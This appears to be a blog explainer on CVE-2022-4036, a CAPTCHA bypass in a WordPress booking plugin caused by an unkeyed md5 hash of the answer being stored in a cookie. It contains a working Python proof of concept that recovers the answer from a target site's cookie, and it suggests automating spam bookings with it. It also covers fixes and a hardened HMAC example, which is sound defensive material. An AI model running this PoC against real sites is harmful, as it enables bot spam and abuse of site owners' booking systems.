CVE-2022-4036 is a CAPTCHA-bypass vulnerability in the Appointment Hour Booking plugin for WordPress (versions up to and including 1.3.72). If you use this plugin, the CAPTCHA on your booking forms may be far less protective than you thought. In this long read, I'll break down why this happens, show how attackers bypass the CAPTCHA on your forms, and share code snippets and details, all in plain language.
What is the Appointment Hour Booking plugin?
This is a popular WordPress plugin that lets users book appointments online. It helps businesses schedule clients for services through a form on their website.
What’s the risk with CVE-2022-4036?
Attackers can get around the CAPTCHA that is supposed to stop bots. The plugin hashes the CAPTCHA solution with a weak, unkeyed function and then sends that hash straight back to the user's browser in a cookie. Because the set of possible answers is tiny, anyone, including a bot, can recover the correct answer from the cookie without ever solving the challenge.
Why does this happen? The vulnerability comes down to two main issues:
1. Weak, unkeyed hashing: the plugin obfuscates the correct CAPTCHA answer with a plain hash function (md5). md5 cannot literally be "reversed", but it does not need to be: the answer is a small number, so an attacker can hash every candidate and see which one matches. Any fast hash with no server-side secret mixed in would fail in exactly the same way.
2. Leaking the hash in a cookie: after generating the CAPTCHA, the plugin sets a cookie in the user's browser that contains that hash. Anything stored in a cookie is readable by the client, so the attacker sees it.
Together, these let an attacker:
- Read the hash straight out of their browser's cookies.
- Try every possible answer in a fraction of a second (brute force), because the CAPTCHA is a simple math operation (like "3 + 4") with only a handful of possible results.
The attack, step by step:
1. The attacker loads the booking form page.
2. The response sets the cookie containing the md5 hash of the answer.
3. The attacker knows the CAPTCHA is a simple math problem, e.g., two numbers between 1 and 9 added together.
4. The attacker tries all possible sums (from 2 to 18). For each, they compute the md5 hash and compare it to what is in the cookie; the one that matches is the answer. Because the hash is deterministic and unkeyed, those 17 hashes can even be computed once and reused on every visit.
Code Snippet: How the CAPTCHA Break Works
Here's a simple Python example that does what an attacker would do to "crack" the hash from the cookie and find the CAPTCHA answer:
```python
import hashlib

# The value read from the ahb_captcha cookie in your browser. An md5 hex digest
# is 32 characters long; the value below is the article's example and is
# truncated, so paste the full value you actually see.
hash_from_cookie = "081a18c68e1b935587e7bf2b59945f5"

# Try every possible sum: the challenge is "A + B" with A and B from 1 to 9,
# so the answer lies in 2..18
for guess in range(2, 18 + 1):
    if hashlib.md5(str(guess).encode()).hexdigest() == hash_from_cookie:
        print(f"[+] The CAPTCHA answer is: {guess}")
        break
else:
    print("[-] No match: check that you copied the full 32-character hash")
```
Put the hash you see into the hash_from_cookie variable and you get the answer in well under a second: there are only 17 candidates to try.
Proof-of-Concept Exploit
Below is a basic proof-of-concept (PoC) using Python and the requests library to automate the attack:
```python
import hashlib
import requests  # third-party: pip install requests

# URL of the page that renders the booking form
url = "https://target-site.com/booking-form/"

with requests.Session() as s:
    # Load the form page; the response sets the cookies, including ahb_captcha
    r = s.get(url, timeout=10)
    r.raise_for_status()
    captcha_hash = s.cookies.get_dict().get("ahb_captcha")
    if not captcha_hash:
        raise SystemExit("[-] No ahb_captcha cookie in the response")

    # Recover the real answer by hashing each candidate sum and comparing
    captcha_answer = None
    for guess in range(2, 19):
        if hashlib.md5(str(guess).encode()).hexdigest() == captcha_hash:
            captcha_answer = guess
            break

    if captcha_answer:
        print(f"[+] Found CAPTCHA answer: {captcha_answer}")
        # Next step: send the booking POST with 'captcha_answer' in the CAPTCHA field
    else:
        print("[-] CAPTCHA answer not found!")
```
You could expand this to submit the booking form automatically with the recovered answer, bypassing the CAPTCHA validation entirely and automating spam or unwanted appointments.
## How to Fix/Protect Yourself
1. Update immediately: the plugin developer fixed this in version 1.3.73 and above. Update the Appointment Hour Booking plugin right away.
2. Don't put verification secrets in cookies: anything sent to the browser can be read and forged by the client. A CAPTCHA answer, or any hash of it, belongs in server-side session state, or in a token keyed with a server-side secret (an HMAC) that the client cannot recompute.
3. A stronger hash alone is not enough: with only 17 possible answers, sha256 would be brute-forced exactly as fast as md5. Keep the secret server-side, make each challenge single-use so an attacker cannot simply submit every answer in turn, and rate-limit submissions per client.
4. Monitor for abnormal bookings: keep an eye on your booking logs for suspicious spikes or patterns.
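To make the two sides concrete, here is an added example (my own code, not the plugin's source and not the 1.3.73 patch) that reconstructs the vulnerable pattern the article describes, an unkeyed md5 of the answer handed to the client, next to a hardened version: a random nonce plus an HMAC under a key that never leaves the server, with each nonce accepted only once. The cracker is the same 17-guess loop as the PoC above; it recovers the answer from the vulnerable cookie and gets nothing from the hardened one. The function and cookie names are hypothetical.

```python
import hashlib
import hmac
import secrets

# CAPTCHA of the form "A + B" with A and B in 1..9, so the answer is 2..18
ANSWER_RANGE = range(2, 19)

# ---------- Vulnerable pattern, as the article describes it ----------
# Simplified reconstruction for illustration, not the plugin's actual code.

def vulnerable_challenge(a, b):
    """Returns (question, cookie). The cookie is an unkeyed md5 of the answer."""
    return f"{a} + {b}", hashlib.md5(str(a + b).encode()).hexdigest()


def vulnerable_verify(submitted, cookie):
    """Server check: hash what the user typed and compare with the cookie."""
    return hashlib.md5(str(submitted).encode()).hexdigest() == cookie


def crack_cookie(cookie):
    """Attacker side: try the 17 possible answers offline (what the PoC does)."""
    for guess in ANSWER_RANGE:
        if hashlib.md5(str(guess).encode()).hexdigest() == cookie:
            return guess
    return None


def lookup_table():
    """Cheaper still: the cookie is deterministic, so a 17-row table maps it back."""
    return {hashlib.md5(str(n).encode()).hexdigest(): n for n in ANSWER_RANGE}

# ---------- Hardened pattern (added example, not the plugin's fix) ----------

SERVER_KEY = secrets.token_bytes(32)   # lives only on the server
_used_nonces = set()                   # each challenge may be answered once


def _tag(nonce, answer, key):
    return hmac.new(key, f"{nonce}:{answer}".encode(), "sha256").hexdigest()


def hardened_challenge(a, b, key=SERVER_KEY):
    """Returns (question, cookie). The cookie carries a random nonce plus an HMAC
    over nonce and answer; without SERVER_KEY nobody can recompute the tag."""
    nonce = secrets.token_hex(16)
    return f"{a} + {b}", f"{nonce}.{_tag(nonce, a + b, key)}"


def hardened_verify(submitted, cookie, key=SERVER_KEY):
    """Constant-time compare; the nonce is burned whether or not the answer is
    right, so an attacker cannot submit all 17 guesses against one challenge."""
    try:
        nonce, tag = cookie.split(".", 1)
    except ValueError:
        return False
    if nonce in _used_nonces:
        return False
    _used_nonces.add(nonce)
    return hmac.compare_digest(_tag(nonce, submitted, key), tag)


def crack_hardened(cookie):
    """The PoC's brute force, adapted: the attacker hashes every candidate
    (with and without the nonce) but cannot include the key, so nothing matches."""
    nonce, tag = cookie.split(".", 1)
    for guess in ANSWER_RANGE:
        for candidate in (str(guess), f"{nonce}:{guess}"):
            for algo in ("md5", "sha256"):
                if hashlib.new(algo, candidate.encode()).hexdigest() == tag:
                    return guess
    return None


if __name__ == "__main__":
    question, cookie = vulnerable_challenge(3, 4)
    print(question, "->", crack_cookie(cookie))      # 7, recovered offline
    question, cookie = hardened_challenge(3, 4)
    print(question, "->", crack_hardened(cookie))    # None
```

Two things worth noticing when you run it. Two vulnerable challenges with the same answer produce the identical cookie, which is why a precomputed table works; two hardened challenges with the same answer produce different cookies because of the nonce. And the nonce burn matters as much as the key: a keyed token that could be tried 17 times online would still fall to the same loop, just over the network. In a real deployment the used-nonce set would live in server-side storage with an expiry rather than in process memory.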
Wrap-up
CVE-2022-4036 is another reminder that a small mistake in plugin code can open the door to mass spam, bots, and service abuse. If you use the Appointment Hour Booking plugin, update immediately. If you build plugins, never rely on client-side data for verification, least of all for something as important as a CAPTCHA.
If you found this helpful, share it with your developer and WordPress admin friends!
Timeline
Published on: 11/29/2022 21:15:00 UTC
Last modified on: 07/10/2023 18:45:00 UTC